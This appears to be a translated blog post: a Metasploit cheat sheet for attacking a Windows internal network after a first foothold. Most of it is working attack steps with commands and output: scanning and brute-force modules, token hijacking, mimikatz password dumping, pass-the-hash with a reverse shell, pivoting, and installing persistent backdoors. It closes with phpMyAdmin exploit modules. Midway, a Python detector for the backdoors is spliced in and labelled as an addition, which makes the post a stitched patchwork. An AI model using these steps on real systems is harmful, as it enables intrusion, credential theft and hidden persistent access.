SOCSEC

Metasploit's Flashy Tricks

1. Information Gathering

The importance of information gathering needs no further explanation here. Once inside the internal network, gather information first; the modules under auxiliary can be used for this.

*Gather host information:
Use the modules under auxiliary/scanner/discovery/ to scan.
Modules:

use auxiliary/scanner/discovery/arp_sweep
use auxiliary/scanner/discovery/empty_udp
use auxiliary/scanner/discovery/ipv6_multicast_ping
use auxiliary/scanner/discovery/ipv6_neighbor
use auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement
use auxiliary/scanner/discovery/udp_probe
use auxiliary/scanner/discovery/udp_sweep

For example:
Figure 1
Figure 2

*Probe host ports:
Use the modules under auxiliary/scanner/portscan/ to probe host ports.
Modules:

auxiliary/scanner/portscan/ack // ACK firewall scan
auxiliary/scanner/portscan/ftpbounce // FTP bounce port scan
auxiliary/scanner/portscan/syn // SYN port scan
auxiliary/scanner/portscan/tcp // TCP port scan
auxiliary/scanner/portscan/xmas // TCP "XMas" port scan

For example:
Figure 3

*Use the modules under auxiliary/scanner/smb/ to identify and gather Windows information:
Modules:

auxiliary/scanner/smb/pipe_auditor
auxiliary/scanner/smb/pipe_dcerpc_auditor // returns DCERPC information
auxiliary/scanner/smb/psexec_loggedin_users
auxiliary/scanner/smb/smb2 // scan for the SMB2 protocol
auxiliary/scanner/smb/smb_enum_gpp
auxiliary/scanner/smb/smb_enumshares // scan SMB shares
auxiliary/scanner/smb/smb_enumusers // enumerate system users over SMB
auxiliary/scanner/smb/smb_enumusers_domain
auxiliary/scanner/smb/smb_login // SMB login
auxiliary/scanner/smb/smb_lookupsid // scan group users
auxiliary/scanner/smb/smb_uninit_cred
auxiliary/scanner/smb/smb_version // scan system version

*Use the modules under auxiliary/scanner/mssql/ to probe SQL Server information.
Modules:

auxiliary/scanner/mssql/mssql_hashdump // dump password hashes
auxiliary/scanner/mssql/mssql_login // password brute force
auxiliary/scanner/mssql/mssql_ping // sniffing
auxiliary/scanner/mssql/mssql_schemadump

*Use the modules under auxiliary/scanner/ssh/ to probe SSH information:
Modules:

auxiliary/scanner/ssh/cerberus_sftp_enumusers
auxiliary/scanner/ssh/detect_kippo
auxiliary/scanner/ssh/ssh_enumusers // enumerate users
auxiliary/scanner/ssh/ssh_identify_pubkeys
auxiliary/scanner/ssh/ssh_login // password brute force
auxiliary/scanner/ssh/ssh_login_pubkey
auxiliary/scanner/ssh/ssh_version // check version

*Use the modules under auxiliary/scanner/ftp/ to probe FTP information:
Modules:

auxiliary/scanner/ftp/anonymous
auxiliary/scanner/ftp/bison_ftp_traversal
auxiliary/scanner/ftp/ftp_login // password brute force
auxiliary/scanner/ftp/ftp_version // check version
auxiliary/scanner/ftp/konica_ftp_traversal
auxiliary/scanner/ftp/pcman_ftp_traversal
auxiliary/scanner/ftp/titanftp_xcrc_traversal

*Use the modules under auxiliary/scanner/mysql/ to probe MySQL information:

auxiliary/scanner/mysql/mysql_authbypass_hashdump
auxiliary/scanner/mysql/mysql_file_enum
auxiliary/scanner/mysql/mysql_hashdump // dump password hashes
auxiliary/scanner/mysql/mysql_login // password brute force
auxiliary/scanner/mysql/mysql_schemadump
auxiliary/scanner/mysql/mysql_version // check version

*Using nmap inside msfconsole:
db_nmap is a wrapper around nmap; its scan results are stored in the database, where Metasploit can use them directly.
db_nmap -sS -A 192.168.xx.xx
Figure 4
Use the db_services command to view the scan results stored in the database.

2. Internal Network Penetration

*Check whether the host is a virtual machine:
Run the command:

meterpreter > run post/windows/gather/checkvm

*Token hijacking
After getting a session, first check which tokens can be stolen. Load the incognito module first, then run the list_tokens -u command to see which tokens exist.

Then try to hijack a token:
impersonate_token <user, e.g. NT AUTHORITY\SYSTEM>

*Port forwarding
It is quite common for the host to sit in an internal network; Metasploit ships with a port forwarding tool.

meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
-L <opt> The local host to listen on (optional).
-h Help banner.
-l <opt> The local port to listen on.
-p <opt> The remote port to connect to.
-r <opt> The remote host to connect to.

meterpreter > portfwd add -L 1234 -p 3389 -r 192.168.32.133
[-] You must supply a local port, remote host, and remote port.
meterpreter > portfwd add -l 1234 -p 3389 -r 192.168.32.133
[*] Local TCP relay created: 0.0.0.0:1234 <-> 192.168.32.133:3389
meterpreter >

Then run on the local machine:

rdesktop -u zero -p haizeiwang123_ 127.0.0.1:1234

*Obtaining passwords
mimikatz can obtain the operating system's plaintext passwords directly, and meterpreter has added this module.
First load the mimikatz module:

meterpreter > load mimikatz
Loading extension mimikatz...success.

Get password hashes:

meterpreter > msv

Get plaintext passwords:

meterpreter > kerberos

*Log in to the system directly with a hash

use windows/smb/psexec
set SMBUser username
set SMBPass <hash of the user's password>
set payload windows/meterpreter/reverse_tcp
set rhost 333.333.333.333
set lhost 111.111.111.111
exploit

*Pivoting through a jump host
After obtaining some level of privilege on the jump host, continue the penetration:
1. Check the machine's IP configuration:

meterpreter > ipconfig /all

Get the local subnets:

run get_local_subnets

2. Add the local gateway and IP address, creating a virtual route through the session:

run autoroute -s 192.168.0.0/24 // subnet

View the routes that have been added:

run autoroute -p

This is the most commonly used method in Metasploit: once the routing table is tied to the session, msf modules can scan or attack across subnets. There are many ways to do this; the autoroute script shown above adds routes quickly, or you can put the current session in the background and then add them with the route command.

*Installing a backdoor (on Windows)
Metasploit's built-in backdoors can be started in two ways: one via a service (metsvc) and one via a startup entry (persistence); each has its own advantages and drawbacks.

Method 1: the persistence method

meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.
OPTIONS:
-A Automatically start a matching multi/handler to connect to the agent
-L <opt> Location in target host where to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on the remote host where Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back
meterpreter >

Run:

meterpreter > run persistence -X -i 10 -p 2241 -r 192.168.111.129

Result:

[*] Running Persistance Script
[*] uploads file for cleanup created at /root/.msf4/logs/persistence/WIN-K30V5SI0PCE_20140313.5419/WIN-K30V5SI0PCE_20140313.5419.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=2241
[*] Persistent agent script is 148439 bytes long
[+] Persistent Script written to C:\Users\ADMINI~1\AppData\Local\Temp\UhyxOTTzTb.vbs
[*] Executing script C:\Users\ADMINI~1\AppData\Local\Temp\UhyxOTTzTb.vbs
[+] Agent executed with PID 2916
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\Current\Version\Run\HstWtPyXHYnhQ
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\Current\Version\Run\HstWtPyXHYnhQ
meterpreter >

Method 2: the metsvc method.
Set up the backdoor:

meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\Users\ADMINI~1\AppData\Local\Temp\HzWbqqRpuBlxn...
[*] >> Uploading metsrv.x86.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
* Installing service metsvc
* Starting service
Service metsvc successfully installed.
meterpreter >

Connect again:

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
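
As an added defensive example that is not part of the original post, the following Python audits a constructed set of autostart entries for the footprints the two outputs above leave behind: a .vbs payload in the user's Temp directory registered under a random Run value name, and a service named metsvc whose binary lives in a Temp directory. The entry names, the paths and the vowel-run randomness heuristic are assumptions modelled on those outputs, not data from a real host.

```python
import re

# Constructed sample of autostart entries (Run values and services), modelled
# on the output printed by the persistence and metsvc scripts above.
AUTOSTART = {
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\HstWtPyXHYnhQ":
        r"C:\Users\ADMINI~1\AppData\Local\Temp\UhyxOTTzTb.vbs",
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth":
        r"C:\Windows\System32\SecurityHealthSystray.exe",
    "service:metsvc":
        r"C:\Users\ADMINI~1\AppData\Local\Temp\HzWbqqRpuBlxn\metsvc.exe",
    "service:Spooler": r"C:\Windows\System32\spoolsv.exe",
}
TEMP_DIR = re.compile(r"\\(AppData\\Local\\Temp|Windows\\Temp)\\", re.IGNORECASE)
SCRIPT_EXT = (".vbs", ".js", ".ps1", ".bat")
VOWELS = set("aeiouAEIOU")

def max_consonant_run(name):
    # Length of the longest vowel-free run of letters in name.
    run = best = 0
    for ch in name:
        run = run + 1 if ch.isalpha() and ch not in VOWELS else 0
        best = max(best, run)
    return best

def looks_random(name, min_run=5):
    # Heuristic (assumption): generated names such as HstWtPyXHYnhQ contain
    # long vowel-free stretches that real product names almost never have.
    return len(name) >= 8 and max_consonant_run(name) >= min_run

def audit_autostart(entries):
    # Return [(entry, reasons)] for entries matching the persistence or metsvc
    # footprint: Temp-resident script/binary, random name, or the metsvc name.
    findings = []
    for entry, path in entries.items():
        name = entry.rsplit("\\", 1)[-1].split(":")[-1]
        reasons = []
        if name.lower() == "metsvc":
            reasons.append("Metasploit default service name")
        if TEMP_DIR.search(path):
            reasons.append("binary lives in a Temp directory")
        if path.lower().endswith(SCRIPT_EXT):
            reasons.append("payload is a script, not a compiled binary")
        if looks_random(name):
            reasons.append("random-looking entry name")
        if reasons:
            findings.append((entry, reasons))
    return findings
```

On a real host the dictionary would be filled from reg query on the Run keys and from the service binary paths; only the two Metasploit entries are reported here, while the legitimate entries pass.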

Method 3: this one is similar to adding an account for remote connection over 3389

meterpreter > run getgui -u zero -p <password>
1. phpMyAdmin exploitation summary
1:
Affected versions: 3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3
Overview: phpMyAdmin has a PREG_REPLACE_EVAL vulnerability
Exploit module: exploit/multi/http/phpmyadmin_preg_replace
CVE: CVE-2013-3238

2:
Affected version: phpMyAdmin v3.5.2.2
Overview: phpMyAdmin has a server_sync.php backdoor vulnerability
Exploit module: exploit/multi/http/phpmyadmin_3522_backdoor
CVE: CVE-2012-5159

3:
Affected versions: 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1
Overview: phpMyAdmin's configuration file /config/config.inc.php allows command execution
Exploit module: exploit/unix/webapp/phpmyadmin_config
CVE: CVE-2009-1151

Summary:

The summary above was compiled from exploitation cases and tutorials by the experts on WooYun and FreeBuf, and I verified some of them myself. I am still young and a novice, so please point out any shortcomings!!